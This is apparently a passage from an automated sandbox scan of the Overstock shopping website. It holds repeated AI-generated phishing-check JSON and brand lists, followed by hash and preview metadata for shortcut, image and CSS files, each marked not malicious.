                                                                                                                                                            "contains_trigger_text": false,
                                                                                                                                                            "trigger_text": "unknown",
                                                                                                                                                            "prominent_button_name": "Shop Now",
                                                                                                                                                            "text_input_field_labels": "unknown",
                                                                                                                                                            "pdf_icon_visible": false,
                                                                                                                                                            "has_visible_captcha": false,
                                                                                                                                                            "has_urgent_text": false,
                                                                                                                                                            "has_visible_qrcode": false
                                                                                                                                                          }
                                                                                                                                                          URL: https://www.overstock.com/ Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "contains_trigger_text": false,
                                                                                                                                                            "trigger_text": "unknown",
                                                                                                                                                            "prominent_button_name": "Shop Now",
                                                                                                                                                            "text_input_field_labels": "unknown",
                                                                                                                                                            "pdf_icon_visible": false,
                                                                                                                                                            "has_visible_captcha": false,
                                                                                                                                                            "has_urgent_text": false,
                                                                                                                                                            "has_visible_qrcode": false
                                                                                                                                                          }
                                                                                                                                                          URL: https://www.overstock.com/ Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "brands": [
                                                                                                                                                              "Overstock"
                                                                                                                                                            ]
                                                                                                                                                          }
                                                                                                                                                          URL: https://www.overstock.com/ Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "contains_trigger_text": false,
                                                                                                                                                            "trigger_text": "unknown",
                                                                                                                                                            "prominent_button_name": "Shop Now",
                                                                                                                                                            "text_input_field_labels": "unknown",
                                                                                                                                                            "pdf_icon_visible": false,
                                                                                                                                                            "has_visible_captcha": false,
                                                                                                                                                            "has_urgent_text": false,
                                                                                                                                                            "has_visible_qrcode": false
                                                                                                                                                          }
                                                                                                                                                          URL: https://www.overstock.com/ Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "brands": [
                                                                                                                                                              "Beyond Inc.",
                                                                                                                                                              "Bed Bath & Beyond",
                                                                                                                                                              "Baby & Beyond",
                                                                                                                                                              "Kids & Beyond",
                                                                                                                                                              "Zulily",
                                                                                                                                                              "College Living",
                                                                                                                                                              "Studio4 Beyond",
                                                                                                                                                              "Backyard",
                                                                                                                                                              "Overstock"
                                                                                                                                                            ]
                                                                                                                                                          }
                                                                                                                                                          URL: https://www.overstock.com/ Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "contains_trigger_text": false,
                                                                                                                                                            "trigger_text": "unknown",
                                                                                                                                                            "prominent_button_name": "Shop Now",
                                                                                                                                                            "text_input_field_labels": "unknown",
                                                                                                                                                            "pdf_icon_visible": false,
                                                                                                                                                            "has_visible_captcha": false,
                                                                                                                                                            "has_urgent_text": false,
                                                                                                                                                            "has_visible_qrcode": false
                                                                                                                                                          }
                                                                                                                                                          URL: https://www.overstock.com/ Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "brands": [
                                                                                                                                                              "Beyond Inc.",
                                                                                                                                                              "Bed Bath & Beyond",
                                                                                                                                                              "Baby & Beyond",
                                                                                                                                                              "Kids & Beyond",
                                                                                                                                                              "Zulily",
                                                                                                                                                              "College Living",
                                                                                                                                                              "Studio4 Beyond",
                                                                                                                                                              "Backyard",
                                                                                                                                                              "Overstock"
                                                                                                                                                            ]
                                                                                                                                                          }
                                                                                                                                                          URL: https://www.overstock.com/ Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "brands": [
                                                                                                                                                              "Beyond Inc.",
                                                                                                                                                              "Bed Bath & Beyond",
                                                                                                                                                              "Baby & Beyond",
                                                                                                                                                              "Kids & Beyond",
                                                                                                                                                              "Zulily",
                                                                                                                                                              "College Living",
                                                                                                                                                              "Studio4 Beyond",
                                                                                                                                                              "Backyard",
                                                                                                                                                              "Overstock"
                                                                                                                                                            ]
                                                                                                                                                          }
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 18 16:23:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2673
                                                                                                                                                          Entropy (8bit):3.986915574638526
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0771AE8BD2049DAA8735B37FC1421C5C
                                                                                                                                                          SHA1:49B5A802BDFF9BBD75FFF62CA072030D0BC57CBB
                                                                                                                                                          SHA-256:9C46863A69C29216BEFCDA9F12C2095D96BB6ECB7D448C7AEA8E00F4DD9D6EF3
                                                                                                                                                          SHA-512:CFDF79DB09381D916DE45CCC11E8CBBD875D0F984ACDADEA58006B9B9D00870CA7EFD7438C039800BDEF86B008DC501659316E27D1DFF4949B8DF3EB2DBCF35B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:L..................F.@.. ...$+.,.......l.!..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IRY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VRY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VRY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VRY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VRY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 18 16:23:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2675
                                                                                                                                                          Entropy (8bit):4.004210552033971
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D7113B9AE1323F2445C29EA23CD361BA
                                                                                                                                                          SHA1:1A6002222208952B20FB28240A3C361CE06EEAA1
                                                                                                                                                          SHA-256:693328FF6F0E3F0A759735A84D63185AC0D144E101E1584D470D99C4855791DC
                                                                                                                                                          SHA-512:5119629273E18CB1B93AABDB763FE76E44260FDA22135BB0E3563518192CC0F65BF2185F30555FC562D9D04290242AE6581BA0E1810A96D6A1B1AC40CDD574CE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:L..................F.@.. ...$+.,.....*.l.!..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IRY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VRY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VRY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VRY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VRY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2689
                                                                                                                                                          Entropy (8bit):4.010835546755472
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:115388CDA97F82035577B7D4F88F899C
                                                                                                                                                          SHA1:0A81EFF767492E4BC0614E183CFA888BE02C8832
                                                                                                                                                          SHA-256:3055B3250DE23B0E8592EA014E4A01BD6FA6F1BAE3045617D9376BD83C521F20
                                                                                                                                                          SHA-512:06358E471E79DDEFEFE63D771A2D8676ADCB718C52D85525DF06073A51592D5ACFE3E70C7132A6D427690A7E0ECF88BFD0FCBB9E217681A3C198B43923599987
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IRY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VRY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VRY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VRY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 18 16:23:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2677
                                                                                                                                                          Entropy (8bit):4.001286056984828
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:AAB2F2041DE0BF03D916D53BB79141FF
                                                                                                                                                          SHA1:BD71EB9E576E534DBB7E986B1797A271568D444D
                                                                                                                                                          SHA-256:3B4A7191AE0EABD71C184F1393D0DA8F5CB3EF52975F3DDD51A31A5291A5C8BA
                                                                                                                                                          SHA-512:01BC2DF8DC13A0011BABE1C1605BCBAD8B7F8FA212577BBE3C3E2A6F3B4A7E945F43BB0BB9D4FF3A4D71391A5B19B667814827A18A721B92E46308655C34335E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:L..................F.@.. ...$+.,.....^.l.!..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IRY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VRY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VRY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VRY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VRY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 18 16:23:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2677
                                                                                                                                                          Entropy (8bit):3.9893385483442905
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:80458615773038A87283700F1591D1C3
                                                                                                                                                          SHA1:041FDD496FD2E753EA1662DE7890374859406853
                                                                                                                                                          SHA-256:C6B3053D07EAA5ACA5061E8A345D79869199ED18DE6230E854761B29ADE1929F
                                                                                                                                                          SHA-512:45BAFCF1E4AD9F09C7C264490BEED8A3A409AFB6E5A793960C7D258E1C92569C0404E0819C2026B3E84F640BFE4113A42CED9C63F47E153AB45043602AB04C62
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:L..................F.@.. ...$+.,.......l.!..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IRY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VRY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VRY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VRY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VRY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 18 16:23:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2679
                                                                                                                                                          Entropy (8bit):3.997501938021887
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:8C1F985B24FE7AC673AEFF9B324D1C43
                                                                                                                                                          SHA1:12B761F470005E8D23F7CC172E229E3908F91A42
                                                                                                                                                          SHA-256:008951048F605288915AA9FBD93AD9D90149053B43B4B729FE36B3440F8A5220
                                                                                                                                                          SHA-512:623EE8CE1929C66B32E02A5FC9E4DB50AE1D643D1301EDC1BC1CB4F5BB6804A39DA0207B2716E1B48384B95EEF639A5E4F9445DA83CD796A5B86F29495396347
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:L..................F.@.. ...$+.,.....s.l.!..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IRY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VRY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VRY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VRY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VRY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):46536
                                                                                                                                                          Entropy (8bit):7.988842093243919
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:363F7A8BB2A0D71D893CD7492AD91D18
                                                                                                                                                          SHA1:B3A4B5CC930DAB325EB5D26F95F197C0161B0C14
                                                                                                                                                          SHA-256:610D19FA75719592910D562C1B140890B6F11E0A684BFCC2D2387F04700A988C
                                                                                                                                                          SHA-512:A6E35D4E2C80F1633CC87321D54E23448A36B8EE9880E6B609BB29EAA377A380902600C970042E70A5EA0EC00B3CC43F493A604548AF737B68AEEA55B76A03A3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Madison-Coleen-Modern-Abstract-Rug_2bfb71b8-9ba4-4c17-a3be-69c0f8728b48.jpg?v=1728071780&width=320
                                                                                                                                                          Preview:RIFF....WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 0...pc...*@.@.>1..B.!..o....Y............1...m.._...K.........?......)...?.......?.z......O....P...............?....`/.?.=m.......;.#........................../...O......?..........o............?..6.'.g.G..lO..............._....t.?.s......$.........?).A.'......./..........gg.....O.G..L.y...?._.~.?...........~Y}..1......._....B....G.....%.....w...c.........................o~....k...'.W.....|....|........g.......K..w?.......w7..S/.v....]b...T.~.[.W.F..V.n..t.{.........gx.).7.C^M,.w.9..G....]$.jWDD............i.. ..5.&
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):41512
                                                                                                                                                          Entropy (8bit):7.966935940375912
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:B57462B9E3443975FB158F24CF04BB9B
                                                                                                                                                          SHA1:69621F57835EA698C81CDF37BEBCB7A9BC71DF24
                                                                                                                                                          SHA-256:FD70B789807F20E455C011C178FB1112E020DBA3DE2FC05E0F24AFFF91C9C432
                                                                                                                                                          SHA-512:E88CB5360E65AFAFC9FCAA81A2253D6C0D3354BA0371030FE528690A1A8A5BEC9823FEF8647A106C406DD19EF6119EEADCC154AF8B496FE6EEE5DCC61CAE8A39
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@.......................................................................................s..7...+......m[..g.t.....{%JBG.gv.ZL./mq.aa.....Ke|.....)i.7Hm":t.I...R.hm..G....^...8.|........."......E.b.I..q..f.#.wn.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 491 x 114, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7026
                                                                                                                                                          Entropy (8bit):7.9322869853309586
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6CEDACB2CE89EBA864352DF545A174C4
                                                                                                                                                          SHA1:530970678238E48BF50025A7A402A65A1C322EC1
                                                                                                                                                          SHA-256:4BC18BAFE6A98379F43D2F9B4A3A42A1EEBAFB8F900168F1A9BDC1762662A7A8
                                                                                                                                                          SHA-512:2DC5D7B856D82C781F765E67AB459CDDA64AAB999162C3F6516187F786B094FC0E11DBE44F286B88F25A04DE9A1B22E7B0FA7531C6ED4A6626C1E0D9987C828E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/s/files/1/0633/7105/1167/files/checkout-ostk-logo-white_x320.png?v=1711576159
                                                                                                                                                          Preview:.PNG........IHDR.......r.....s......$eXIfII*.......<...............imagery4..'=......pHYs.........&.:4....sRGB.........gAMA......a.....IDATx..K....q...7.6.t..(...=.&;;RX..a.H4;..b6...Hx....)..),..d.$.....L B`.C.1....#..._Rnn...S.T....I-.}...N..9.s...{.!..B.d ..~ !..BH.P..!...X.B.!.C.&..B".bM.!.D...B....5!...9.kB.!$r.B..X.6..8.l.l:Y....B.!..h.X?...d[*....O...%c.l.|=.L.L.!....m-7.........vt...3..cS.7.y#!..B....N.qz~d.5..{..T..+......B.i...k..a....2;u"....o..M.!.......g.....E....7h.'.......Sw'`.5/B.6.y)......B.i.Q..!..'.....$$4..B......U...4N.!$V..k....=.P~4...!..H.b=.kG2:q0..cW......Gi.'......5........c....o..h.B.i...`...K#*.N...\_:B.h.B.!MR.X7.&..B.H-bm-.J.!....T.%.+3).B.!.`b...4!......5L...~.&oB.!.....~..C..g~..B.!.......$....|/Y.k{....<.......3_$wff..g.%..o......!$ ..z.3Oe.+...n......uu_.\...?'WO.1..G.!1.}.....8|\.. ..'.._.?@......}.N..cY.4.nv4#.4.Pj).4.......b.{.P.#.E$/..M%..OQ..!..j...../}7...w..i.c7.....5Q..s.A..hF........1.7....P..z.g.Q.......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1034)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1035
                                                                                                                                                          Entropy (8bit):5.012195257175598
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:FEBA970738E534FD43162CFB19D41952
                                                                                                                                                          SHA1:FAA9D5B4AC3ED55A1A420DE50AC1D1595B6CA585
                                                                                                                                                          SHA-256:FC3577CA402B2AE1AD90260A383062510963F599FB68D969DA0D1486AE5FD5BE
                                                                                                                                                          SHA-512:AEBB5A73D2869068F93C0CB9D20A09330E6D2B3E0D8B2D2615D66924769D650FDB39E3AF068A33274AC1AD1B21EFA703AFA4F85408144F900629710DE2DE97B2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/Rollup.o9Mx-fKL.css
                                                                                                                                                          Preview:[dir=ltr] ._7Vwjr{text-align:left}[dir=rtl] ._7Vwjr{text-align:right}._7Vwjr{position:relative;line-height:var(--x-spacing-large-200);transition:opacity var(--x-duration-fast) var(--x-timing-ease-out)}.tq3Uk{padding-top:var(--x-spacing-small-400)}.oNgGT{transition:opacity var(--x-duration-fast) var(--x-timing-ease-out)}.n5gP0{font-weight:var(--x-typography-primary-weight-base);font-size:var(--x-typography-size-default)}.n5gP0>button:focus-visible{outline:none;border-radius:var(--x-global-border-radius, var(--x-border-radius-base))}.n5gP0>button:active .wSTmt span,.n5gP0>button:focus-visible .wSTmt span{color:var(--x-default-color-accent)}@media (hover: hover){.n5gP0:hover .wSTmt span{color:var(--x-default-color-accent)}}.n5gP0 span._7tqW8{margin-top:calc(var(--x-spacing-base) * -1)}@media screen and (min-width: 1000px){.gxa2t{border-radius:var( --x-control-border-radius, var(--x-global-border-radius, var(--x-border-radius-base)) );background-color:var( --x-default-color-accent-foregrou
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):595
                                                                                                                                                          Entropy (8bit):4.677732062182454
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:AE0AC625028C776A1BBB6FAAF603B69D
                                                                                                                                                          SHA1:96DCC6CAFBD98A6134407DAD79AA72E2F8769F38
                                                                                                                                                          SHA-256:C95916B88A9A93FA9A8EC7EED9D4F66F6CAEC7142BD47C40C7F9587DDC9C5B3B
                                                                                                                                                          SHA-512:A49B3D029FC9BD4AE76AB12C8B4A6506CA0E881D8C62A71609EA84C6864058C3C0C5B437458D7CE84BC40625F3138FFC70EF68FBEBB78B77EC3ECC54884E8A5A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/animate-on-scroll.css?v=116194678796051782541729142870
                                                                                                                                                          Preview:.cc-animate-enabled [data-cc-animate] {. opacity: 0;.}.@media (prefers-reduced-motion) {. .cc-animate-enabled [data-cc-animate] {. animation: none !important;. opacity: 1 !important;. }.}..no-js .cc-animate-enabled [data-cc-animate] {. animation: none !important;. opacity: 1 !important;.}..@keyframes fade-in {. 0% {. opacity: 0;. }. 100% {. opacity: 1;. }.}..cc-animate-enabled [data-cc-animate=""].cc-animate-in,..cc-animate-enabled .fade-in.cc-animate-in {. animation: fade-in calc(var(--aos-animate-duration, 1s) * 0.8) 0.3s cubic-bezier(0.39, 0.575, 0.565, 1) both;.}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (23092)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):28315
                                                                                                                                                          Entropy (8bit):5.250814308268855
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:4FD0680EED907ADAF3F85849C393D688
                                                                                                                                                          SHA1:B37DB94DF8A3F1457DAA5DB860D93772311BA5E4
                                                                                                                                                          SHA-256:7AB04D2682AEB63A3FAC2930C5C21A2C922A811A1B32AAFBEF1B58595E0A9E03
                                                                                                                                                          SHA-512:5AE518308F079DB8AD1749A6D85BC7B86D9315B660355EAC06D82D683697A23F0AE5415F281449434A86049CF195752B39A33AEBC5ACAAF7317DD7E5606FC82D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
